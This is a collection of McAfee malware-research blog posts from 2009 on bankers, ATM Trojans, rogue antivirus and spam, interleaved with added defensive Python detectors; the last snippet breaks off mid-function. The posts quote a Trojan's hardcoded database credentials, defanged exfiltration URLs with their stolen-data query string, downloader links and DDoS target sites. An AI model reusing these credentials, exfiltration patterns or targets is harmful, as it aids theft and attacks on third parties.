    Recently, my colleague Pedro Bueno wrote about “dumb” malware authors hardcoding their login credentials into their password-stealing Trojan. The malware he referenced, PWS-Banker.gen.i, ostensibly came from Brazil. Today, we found the same negligence in a similar piece of Chinese malware detected as PWS-Banker.gen.de.

    When run, the password-stealing Trojan queries for the infected host’s IP address using three web-based IP address-lookup services. It then makes a SQL query over TCP to post stolen passwords to a server in China. This is part of the actual connection string the Trojan uses to log into the malicious SQL server:

    Provider=SQLOLEDB.1;Password=168520564;Persist Security Info=True;User ID=mengmeng;[REMOVED]

    mengmeng has been malicious and, what’s more, careless enough to leave his login credentials in the open. Please keep your DATs updated to stay secure!

    DDoS Not the Most Political Way to Protest

    So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

    http://www.leader.ir/
    http://president.ir/
    http://www.irib.ir/
    http://www.iribnews.ir/

    and some specific URLs on those domains.

    No, guys, that’s not the right path, and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques, and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

    Worms Dig Further Than Thumb Drives

    Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

    Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

    So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

    Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

    A) Most USB devices that you can plug into your computer that have storage

    If you answered A, you’re right! (That wasn’t hard, was it?)

    How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

    How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

    Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

    But going down the road to prevention is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRun worms can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

    Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

    If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

    That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”
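As an added example, not McAfee’s code, here is a small Python checker that parses an autorun.inf from a mounted device and reports what Windows would launch from it and through which trigger, so a music player or camera can be inspected before it is plugged into the next machine. Both autorun.inf samples are constructed.

```python
"""Parse an autorun.inf found on removable media and report what Windows
would launch from it and how. Added example, not McAfee's code; both
autorun.inf samples below are constructed."""
from typing import Dict, List

# File types Windows runs directly when named in open= or a
# shell\<verb>\command= entry.
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".bat", ".cmd", ".pif", ".vbs", ".js", ".wsf")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the key=value pairs of the [autorun] section, keys lowercased.
    Section and key names are case-insensitive in Windows, so normalise them
    rather than matching the literal text a worm happened to write."""
    entries: Dict[str, str] = {}
    in_autorun = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                                   # blank or comment
        if line.startswith("[") and line.endswith("]"):
            in_autorun = line[1:-1].strip().lower() == "autorun"
            continue
        if in_autorun and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(entries: Dict[str, str]) -> List[Dict[str, str]]:
    """Every program the file can cause to run, and the trigger for each."""
    targets = []
    for key in ("open", "shellexecute"):
        if key in entries:
            targets.append({"how": f"{key}= (AutoPlay on insert)", "command": entries[key]})
    default_verb = entries.get("shell", "").strip().lower()
    for key, value in entries.items():
        parts = key.split("\\")
        if len(parts) == 3 and parts[0] == "shell" and parts[2] == "command":
            how = f"shell\\{parts[1]}\\command="
            if parts[1] == default_verb:
                how += " (default action: runs on double-click of the drive)"
            targets.append({"how": how, "command": value})
    return targets


def assess(text: str) -> Dict[str, object]:
    """Flag the file when any launch trigger points at an executable."""
    entries = parse_autorun(text)
    targets = launch_targets(entries)
    reasons = []
    for t in targets:
        # First token of the command is the program; strip any quoting.
        program = t["command"].split()[0].strip('"').lower() if t["command"] else ""
        if program.endswith(EXECUTABLE_EXT):
            reasons.append(f"{t['how']} runs {program}")
    if reasons and "shell" in entries:
        reasons.append(f"default shell verb overridden (shell={entries['shell']})")
    return {"entries": entries, "targets": targets,
            "reasons": reasons, "suspicious": bool(reasons)}


# Constructed samples: the first is shaped like a worm's autorun.inf (the
# program path is made up), the second like a vendor driver disc.
WORM_STYLE = r"""
[AutoRun]
icon=Music\player.ico
open=Music\player.exe
shell\Open\Command=Music\player.exe
shell\Explore\Command=Music\player.exe
shell=Open
action=Open folder to view files
"""
BENIGN = r"""
[autorun]
icon=setup.exe,0
label=Vendor Driver Disc
"""

if __name__ == "__main__":
    for name, sample in (("worm-style", WORM_STYLE), ("benign", BENIGN)):
        print(name, assess(sample))
```

Disabling AutoPlay, the mitigation the post names, is what stops these entries from running; this checker only tells you what a given device would have launched.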

    Dumb Malware Authors Cause More Damage Than Smart Ones

    I don’t really know which is worse: a dumb or a smart malware writer.

    Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

    While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

    Next this malware sends the information to a remote SQL database. Nothing new to see here, because password-stealing Trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

    Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000
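Both this sample and the Chinese PWS-Banker.gen.de discussed earlier carry an OLE DB connection string in the clear. As an added example, not McAfee’s code, the following Python pulls such strings out of a sample and parses them into the fields a triage analyst needs, masking the password so the report does not spread the credentials any further. The sample bytes, hostnames and credentials are constructed placeholders.

```python
"""Pull embedded OLE DB/ADO connection strings out of a sample and report
the fields an analyst needs (drop server, user, database, whether a password
is hardcoded). Added example, not McAfee's code: the "binary" below is
constructed, with placeholder hostnames and credentials."""
import re
from typing import Dict, List

# Both bankers on this page open with 'Provider=SQLOLEDB.1', so anchor on
# 'Provider='. Windows binaries store strings as either ANSI or UTF-16LE,
# so both encodings are searched. A run stops at the first non-printable
# byte, which in practice is the string's NUL terminator.
_ASCII_RE = re.compile(rb"Provider=[\x20-\x7e]{8,512}")
_UTF16_RE = re.compile(
    rb"P\x00r\x00o\x00v\x00i\x00d\x00e\x00r\x00=\x00(?:[\x20-\x7e]\x00){8,512}")

SECRET_KEYS = ("password", "pwd")


def parse_connection_string(cs: str) -> Dict[str, str]:
    """Split 'Key=Value;Key=Value;...' into a dict with lowercased keys."""
    fields: Dict[str, str] = {}
    for part in cs.split(";"):
        key, sep, value = part.partition("=")
        if sep:
            fields[key.strip().lower()] = value.strip()
    return fields


def mask_secrets(cs: str) -> str:
    """Blank out password values so the string can go into a report."""
    out = []
    for part in cs.split(";"):
        key, sep, _value = part.partition("=")
        if sep and key.strip().lower() in SECRET_KEYS:
            out.append(f"{key}=******")
        else:
            out.append(part)
    return ";".join(out)


def find_connection_strings(blob: bytes) -> List[str]:
    """All ANSI and UTF-16LE connection strings found in the blob."""
    found = [m.group(0).decode("ascii") for m in _ASCII_RE.finditer(blob)]
    found += [m.group(0).decode("utf-16-le") for m in _UTF16_RE.finditer(blob)]
    return found


def triage(blob: bytes) -> List[Dict[str, object]]:
    """One record per embedded connection string."""
    records = []
    for cs in find_connection_strings(blob):
        f = parse_connection_string(cs)
        records.append({
            "provider": f.get("provider", ""),
            "server": f.get("data source", f.get("server", "")),
            "database": f.get("initial catalog", f.get("database", "")),
            "user": f.get("user id", f.get("uid", "")),
            "hardcoded_password": any(k in f for k in SECRET_KEYS),
            "masked": mask_secrets(cs),
        })
    return records


# Constructed stand-in for a sample: an ANSI string and a UTF-16LE string
# surrounded by filler bytes. Hosts use the reserved .invalid TLD.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03filler\x00"
    b"Provider=SQLOLEDB.1;Password=placeholder-pw;Persist Security Info=True;"
    b"User ID=dropuser;Initial Catalog=logins;Data Source=sql.example.invalid;"
    b"Packet Size=10000\x00more filler\x00"
    + "Provider=SQLOLEDB.1;Password=pw2;User ID=u2;Data Source=db.example.invalid"
      .encode("utf-16-le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for rec in triage(SAMPLE_BINARY):
        print(rec)
```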

    What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

    Yes, it is just another password-stealing Trojan. No need to get too excited. :) And, yes, we already detect this malware–as PWS-Banker.gen.i.

    ATM Malware Makes Withdrawals in Russia

    We frequently encounter password stealers and backdoors on computers after their owners have browsed unsafe websites or opened unknown email attachments. It is more unusual, however, to see such malware installed directly in banks’ automated teller machines. In these cases, the Trojans have to be installed by people who have physical access to the machines. Data collection and malware removal would require yet another visit or visits. It should seem obvious that such malware installation requires a high level of “cooperation” from the bank staff.

    One of the first attacks occurred in Russia more than one year ago. It was announced in January 2009 when Diebold Inc. released a security fix for its Opteva Windows-based ATMs. At that time, the company said some suspects were apprehended. But it seems the gang was not fully dismantled. In May, we heard of new suspicious files discovered in Eastern European ATMs. The security firm Trustwave published a study concerning this matter. The software had been updated and new virtual robberies had been launched. On June 3, The Register also raised public awareness by covering the story.

    When active, the Trojan intercepts transactions and records them on log files. To control an infected ATM, the attacker uses dedicated credit cards that allow him to activate some administrative rules. Via the ATM’s display, he can select various options from the keypad to display statistics (numbers of transactions, cards, keys), print collected data, force the machine to dispense all its cash, uninstall the malware set, and reboot the ATM. Unfortunately, I was unable to test such malware in a real environment (I do not have a spare ATM lying around), but looking at the samples is very instructive. As in the previous attacks, the vulnerable ATMs are equipped with the Diebold Agilis 91x software, and the attacker can examine the registry to display version and statistics:

    Targeted currencies are the U.S. dollar, Russian ruble (RUR), and the Ukrainian Hryvnia (UAH):

    The attacker can also–through a password-protected routine–control the currency-dispensing ATM cassette:

    We are not aware of any such attacks outside Eastern Europe, but we encourage financial institutions to verify the integrity of their ATM systems. Be proactive!

    The known versions of this malware are detected by McAfee VirusScan as PWS-BoldDie. Many generic and unclassified versions can be detected under the name Generic Backdoor!bw.

    New McAfee Whitepaper on Browser Attacks

    Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

    Web Browsers: An Emerging Platform Under Attack
    “The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success.”

    Other areas the paper covers include:

    • The shift in spam to mainly malicious web link usage

    • “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

    • Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

    • Use of malicious video banners placed in advertisement networks

    • Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

    Download the paper in its entirety here.

    Social Engineering Aids Malware Delivery

    Earlier today the nice folks at SANS blogged about a malware campaign dressed up as a digital-certificate update for Bank of America. The malicious link contained the substring “bankofamerica.com” and took you to a Web page rigged to mimic Bank of America’s Web page:

    Bank of America phish

    If you clicked on “Update Certificate,” a certifiably nasty piece of malware was served to you under the filename sophialite.exe.

    Did you install this “certificate” by accident? Worry not. We have proactively detected this file as Spam-Mailbot.m since the 5631 DATs, released on May 30. Further, we have added detection for the file that it drops into C:\Windows\system32\sdra64.exe as PWS-Zbot and memory cleaning for the same as Spy-Agent.bw.gen!mem. This will make it to the DATs after Wednesday, June 3.

    The takeaway from today’s social-engineering attack: If you receive suspicious email claiming to come from your bank, please do not follow the links in it! It’s advisable to visit banking-related websites using only your bookmarks. In the second step of today’s attack, cautious users may have picked up on the deception if they noticed that the “Secure Area” sign did not match the non-secure HTTP URL.

    Psychologists would term the tricks employed above as abuses of the “exposure effect” and “anchoring.” For some background on these terms, have a peek at my article on the psychology of social engineering in the Fall 2008 edition of McAfee Security Journal. Happy reading :) .

    McAfee Releases June Spam Report

    Today we released our Spam Report for the month of June. In it we discuss two key findings:

    President Obama’s First 100 Days of Spam
    Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

    Identifying Spam Trends of the Future
    Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

    What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long as we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

    Who Digs the Elephant Trap?

    It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

    Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

    Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

    As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what, an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles.

    We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake, or that there will be an unpleasant slowdown due to long analysis. Either can cause trouble for users. If you feel that you really must use an obfuscating protector, at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

    The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use them if you can avoid it.

    Double Strike by AMTSO

    It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Standards Organization (www.amtso.org). The awesome historic surroundings set the mood for our discussions.

     Budapest

    Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009”), it is clear that we need transparent and fair testing more than ever.

    AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

    AMTSO documents

    But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

    • The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell to agree on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
    • “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

    McAfee Unveils H*Commerce Web Film Series on Cybercrime

    Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

    The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

    The project was originally conceived as a series of standalone episodes, each focusing on a different aspect of cybercrime, such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

    Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

    Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

    Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

    FakeAlert Trojan Holds Systems For Ransom

    In March 2009, we notified our customers of a new variant of the infamous Vundo Trojan family, which we detected as Ransom-F, and raised its risk assessment to a Low-Profiled threat. It was possibly the first indicator of a shift in the FakeAlert criminal model from instilling fear to holding information technology resources for ransom, but certainly not the last.

    Last week, we came across a new variant of a rogue security program, branded by its creators as “System Security 2009”, which we detect as FakeAlert-CO; some of its past, similarly branded cousins are detected as FakeAlert-SystemSecurity.

    The updated variants were discovered on a web page hosted on trustedw{blocked}security.com. Like most other rogue security programs to date, FakeAlert-CO displays spurious alerts and makes fraudulent claims of infections that require the user to pay a fee to “repair” them. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-CO that resemble some common characteristics of ransomware Trojans.

    Once installed, FakeAlert-CO may either terminate all running user processes or prompt the user to reboot.

    In either case, it then pretends to perform a system scan and reports detections of false and exaggerated threats.

    What sets it apart from older variants is that the user is no longer allowed to open or execute any applications, including Task Manager, Command Prompt, or other system and office applications, which are terminated by FakeAlert-CO. A message is displayed indicating that the files are infected and that, to resolve the issue, the user must activate FakeAlert-CO at a cost.

    The “product” website is made to look fairly professional, offering an option to purchase a two-year license or a lifetime support license at a “discount”, and it even comes with a 30-day money-back guarantee!

    You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

    Uninstalling the System Security “product” will not be an option for the typical user, as there is no uninstaller function, nor can “Add or Remove Programs” in the Control Panel be opened by the usual means.

    However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

    Affected VirusScan users may remove this threat using the latest DATs and engine.

    McAfee Releases First-Quarter Threats Report

    Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

    Other Key Findings

    The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

    Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

    Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

    Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

    You can find the full text of the “McAfee Threats Report: First Quarter 2009” here.

    Swine Flu Subjects and e-Pharmacy Sites

    We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command.

    The image below is a collection of a bunch of swine flu spams:

    Swine Flu Spams

    You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

    Here is a screenshot of the e-pharmacy they all lead to:

    Swine Flu e-Pharm Site

    You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

    As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

    Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

    A closer look at a Swine Flu spam

    It’s been just a few days since we started talking about spam using Swine Flu as a way to catch users’ attention to sell pills. This time, however, the message is not very “healthy”:

    Swine Flu

    The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage; the experts are trying to calm people down, but the pictures show that calming down is the only thing we shouldn’t do. See how the patient becomes in the advanced stage”.

    As we saw yesterday in David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch users’ attention. But remember, this is spam; they use this to make users believe that the news is true.

    Links lead to two different malware files:

    http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar
    => Foto.29.04.2009.com

    http://[removed].ru./uploaded/alerta.php?atencao=ver
    => Foto.29.04.2009.jpg.exe

    They are identified as PWS-Banker-dldr and PWS-Banker-gen.g.

    The file Foto.29.04.2009.com is a downloader that fetches the URL below and drops it as C:\WINDOWS\temp\configura.exe:

    http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

    This file is identified as PWS-Banker-gen.b.

    This is a common banker malware that overlays a fake image over the real banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter his personal information and even his credit card data:

    overlayed bank image

    overlayed bank image

    overlayed bank image

    The information about the hacked machine and the banking data are then posted to the sites below:

    hxxp://[removed-1].100webspace.net/post.php

    hxxp://[removed-2].100webspace.net/post.php

    hxxp://[removed-3].100webspace.net/post.php

    hxxp://[removed-4].100webspace.net/post.php

    This is the string appended to the URLs above:

    tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&
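As an added example, not the post’s code, the following Python flags both observable stages of this campaign in web proxy logs: the lure link ending in alerta.php?atencao=... and the check-in beacon to post.php carrying the string above. The log format, hostnames, client addresses and machine/user names are constructed; only the URL shapes come from the post.

```python
"""Detect the two observable stages of the banker described above in web
proxy logs: the lure link (alerta.php?atencao=...) and the check-in beacon
(post.php?tipo=inf&tip=<machine>+<user>&inf=INFECTADO%0D%0A&).
Added example, not McAfee's code. Log lines and hostnames are constructed."""
from typing import Dict, List
from urllib.parse import urlparse, parse_qs

# Constructed proxy log: "<timestamp> <client-ip> <method> <url> <status>"
SAMPLE_LOG = """\
2009-04-29T10:12:01Z 10.0.0.5 GET http://www.example.com/index.html 200
2009-04-29T10:12:07Z 10.0.0.5 GET http://cch.example.invalid/images/thumb/xxx/alerta.php?atencao=visualizar 200
2009-04-29T10:12:09Z 10.0.0.5 GET http://drop1.example.invalid/post.php?tipo=inf&tip=WKS-042+maria&inf=INFECTADO%0D%0A& 200
2009-04-29T10:13:00Z 10.0.0.9 POST http://blog.example.invalid/post.php?tipo=comment 200
"""


def classify_url(url: str) -> Dict[str, str]:
    """Describe which stage (if any) a URL matches; {} when neither rule fires."""
    parsed = urlparse(url)
    path = parsed.path.lower()
    query = parse_qs(parsed.query, keep_blank_values=True)

    # Stage 1: the spam's lure link. Both URLs in the post end in alerta.php
    # with an 'atencao=' parameter, on whichever host the spammers abuse.
    if path.endswith("/alerta.php") and "atencao" in query:
        return {"stage": "lure", "host": parsed.hostname or ""}

    # Stage 2: the check-in beacon. Require all three markers so an ordinary
    # blog's post.php (last sample line) is not flagged.
    if path.endswith("/post.php") and query.get("tipo") == ["inf"]:
        marker = query.get("inf", [""])[0].strip()   # %0D%0A decodes to "\r\n"
        if marker == "INFECTADO":
            # 'tip' is "<machinename>+<username>"; '+' also decodes to a
            # space, so split on the first space after decoding.
            tip = query.get("tip", [""])[0]
            machine, _, user = tip.partition(" ")
            return {"stage": "exfil", "host": parsed.hostname or "",
                    "machine": machine, "user": user}
    return {}


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run classify_url over every well-formed log line; return the hits."""
    alerts = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue                      # skip blank or malformed lines
        ts, client, method, url, _status = fields[:5]
        hit = classify_url(url)
        if hit:
            hit.update({"ts": ts, "client": client, "method": method})
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG.splitlines()):
        print(alert)
```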

    But one image inside this malware caught our attention. The image below tries to pass itself off as the website of the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to look up information about Brazilian citizens:

    overlayed bank image

    They attempt to steal usernames and passwords for this site. If the miscreants got access to this site, they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

    As we can see, an apparently innocent e-mail could cause your banking information to be stolen, and could even have more serious implications, as in the case above.

    Looking at Swine Flu Spam Globally

    Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers.

    Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend, and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel, I was able to pull the following chart on the sheer growth in the words “swine” and “flu” used in a subject line over the last several days:

    Percent Increase of Swine Flu in Subject Line

    Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

    From the beginning of the campaigns we have seen it generated from all over the world, which is not really a surprise when one considers the global nature of botnets and spam, but the country breakdown is interesting to look at. It seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

    Countries Sending Swine Flu Spam

    No safe country from spammers, eh? When you consider that on any given day there are between 80 and 170 billion email messages, with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers’ disposal and it is very hard to protect against.

    April Email and Spam Volumes

    We have also seen sites with the words “swine” and “flu” pushing malware. In this case it’s a redirect to a Russian-based site that requires our old friend, the fake codec, to be installed to view the movie:

    Swine Flu Redirect to Fake Codec

    Malware writers, spammers and scammers are lowlifes. They will use any high-profile media event or high-impact news story to push their wares, including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic, go to the World Health Organization website.

    Beware of Shady Installers

    Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

    At Step 3 of the installation I saw this dialog box:
    Step 3 of Ransom-E installation

    The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

    As usual, we shouldn’t install programs from sources that we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing with fraudsters. So why continue with the installation? :-)

    We detect this Trojan as Ransom-E, updated in the 5597 DATs.

    StealthMBR gets a makeover

    New variants of the StealthMBR trojan, aka the Mebroot rootkit, have recently been spotted in the wild. These new variants are significantly different from earlier ones.

    StealthMBR has arguably earned the title of the stealthiest rootkit ever seen. The new variants use even ‘deeper’ techniques to evade detection. Broadly speaking, they hijack kernel objects (the disk device object) to filter access to the master boot record and prevent detection and repair. Whereas earlier variants installed lower-level hooks on the IRP table of \driver\disk, these new variants are able to hook the IRP table of an even lower driver. These hooks are not present all the time, either, but are installed only on demand; the hijacked disk device object is used to facilitate this. Detection is not the only problem: this threat also poses cleaning challenges by installing watching mechanisms that re-infect the machine. The following image shows what an infected MBR looks like. Booting from an external medium and inspecting the disk should reveal the infected MBR.

    Infected MBR
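As an added illustration, not code from the original post, the following Python shows what "booting from an external medium and inspecting the MBR" amounts to in practice: parse the 512-byte sector, check the 0x55AA signature and the partition table, and compare a SHA-256 of the 446-byte bootstrap area against a hash recorded while the machine was known clean. The sample MBR is constructed inside the script; on a real system the sector would come from the rescue medium, for example `dd if=/dev/sda bs=512 count=1`.

```python
import hashlib
import struct

SECTOR_SIZE = 512
BOOT_SIGNATURE = b"\x55\xAA"
ENTRY_FMT = "<B3sB3sII"  # status, CHS start, type, CHS end, LBA start, sector count


def build_sample_mbr(bootstrap_code):
    """Constructed 512-byte MBR: given boot code, one bootable NTFS partition, 0x55AA."""
    code = bootstrap_code.ljust(446, b"\x00")[:446]
    entry = struct.pack(ENTRY_FMT, 0x80, b"\x01\x01\x00", 0x07, b"\xFE\xFF\xFF", 63, 20_000_000)
    table = entry + b"\x00" * 48          # three unused entries
    return code + table + BOOT_SIGNATURE


def parse_mbr(sector):
    """Split an MBR into a bootstrap-code hash, the partition table and a signature check."""
    if len(sector) != SECTOR_SIZE:
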